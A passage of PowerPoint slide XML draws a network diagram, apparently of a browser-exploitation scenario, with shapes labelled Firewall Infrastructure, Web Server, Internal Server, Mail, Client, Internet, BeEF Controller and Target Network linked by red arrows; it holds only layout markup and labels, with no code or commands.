        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4191000" y="5734050"/>
            <a:ext cx="1173163" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Firewall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3644900"/>
            <a:ext cx="776288" cy="393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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="741363" y="4130675"/>
            <a:ext cx="2820987" cy="1854200"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41852"/>
              <a:gd name="adj2" fmla="val -28134"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2068" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5694363" y="4251325"/>
            <a:ext cx="2463800" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39667"/>
              <a:gd name="adj2" fmla="val 20880"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2069" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7589838" y="5562600"/>
            <a:ext cx="715962" cy="238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Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2070" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="3665538"/>
            <a:ext cx="1476375" cy="239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Internal Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2071" name="Freeform 50"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1408113" y="4298950"/>
            <a:ext cx="2352675" cy="341313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1526"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 334"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1526"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 334"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1526"/>
              <a:gd name="T5" fmla="*/ 0 h 334"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1526"/>
              <a:gd name="T10" fmla="*/ 0 h 334"/>
              <a:gd name="T11" fmla="*/ 1526 w 1526"/>
              <a:gd name="T12" fmla="*/ 334 h 334"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1526" h="334">
                <a:moveTo>
                  <a:pt x="0" y="163"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="497" y="235"/>
                  <a:pt x="987" y="334"/>
                  <a:pt x="1241" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1495" y="280"/>
                  <a:pt x="1467" y="64"/>
                  <a:pt x="1526" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Line 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4725988" y="3687763"/>
            <a:ext cx="709612" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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2073" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5676900" y="3417888"/>
            <a:ext cx="536575" cy="225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100" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2074" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1693863" y="4633913"/>
            <a:ext cx="1258887" cy="23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spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2075" name="Freeform 100"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4846638"/>
            <a:ext cx="157163" cy="393700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T1" fmla="*/ 0 h 384"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 384"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 384"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 102"/>
              <a:gd name="T10" fmla="*/ 0 h 384"/>
              <a:gd name="T11" fmla="*/ 102 w 102"/>
              <a:gd name="T12" fmla="*/ 384 h 384"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="102" h="384">
                <a:moveTo>
                  <a:pt x="6" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="83"/>
                  <a:pt x="0" y="167"/>
                  <a:pt x="16" y="231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="295"/>
                  <a:pt x="67" y="339"/>
                  <a:pt x="102" y="384"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5105400" y="3352800"/>
          <a:ext cx="638175" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265824" name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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3352800"/>
                        <a:ext cx="638175" cy="11430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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5105400" y="4057650"/>
          <a:ext cx="638175" cy="1123950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265825" name="Clip" r:id="rId6" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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4057650"/>
                        <a:ext cx="638175" cy="11239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052" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3733800" y="3733800"/>
          <a:ext cx="638175" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265826" name="Clip" r:id="rId7" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId7" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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3733800"/>
                        <a:ext cx="638175" cy="11430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053" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4419600" y="4667250"/>
          <a:ext cx="638175" cy="1123950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265827" name="Clip" r:id="rId8" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 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4667250"/>
                        <a:ext cx="638175" cy="11239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076" name="Freeform 95"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4192588" y="4433888"/>
            <a:ext cx="3552825" cy="677862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2304"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 662"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2304"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 662"/>
              <a:gd name="T4" fmla="*/ 0 w 2304"/>
              <a:gd name="T5" fmla="*/ 0 h 662"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2304"/>
              <a:gd name="T10" fmla="*/ 0 h 662"/>
              <a:gd name="T11" fmla="*/ 2304 w 2304"/>
              <a:gd name="T12" fmla="*/ 662 h 662"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2304" h="662">
                <a:moveTo>
                  <a:pt x="2304" y="662"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1680" y="559"/>
                  <a:pt x="1056" y="456"/>
                  <a:pt x="672" y="346"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="236"/>
                  <a:pt x="144" y="118"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2077" name="Freeform 96"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="4919663"/>
            <a:ext cx="6159500" cy="773112"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3994"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3994"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T4" fmla="*/ 0 w 3994"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3994"/>
              <a:gd name="T10" fmla="*/ 0 h 755"/>
              <a:gd name="T11" fmla="*/ 3994 w 3994"/>
              <a:gd name="T12" fmla="*/ 755 h 755"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3994" h="755">
                <a:moveTo>
                  <a:pt x="3994" y="371"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3381" y="185"/>
                  <a:pt x="2768" y="0"/>
                  <a:pt x="2102" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1436" y="128"/>
                  <a:pt x="718" y="441"/>
                  <a:pt x="0" y="755"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2054" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7010400" y="3886200"/>
          <a:ext cx="638175" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265828" name="Clip" r:id="rId9" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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3886200"/>
                        <a:ext cx="638175" cy="11430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055" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7620000" y="5029200"/>
          <a:ext cx="638175" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s265829" name="Clip" r:id="rId10" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId10" imgW="2501798" imgH="2616098" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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5029200"/>
                        <a:ext cx="638175" cy="11430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078" name="Text Box 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="654050" y="6073775"/>
            <a:ext cx="1344613" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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BeEF Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2079" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6629400" y="4419600"/>
            <a:ext cx="1676400" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Target Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2080" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3581400"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2057" name="Object 57"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s265830" name="Clip" r:id="rId11" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId11" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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107" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
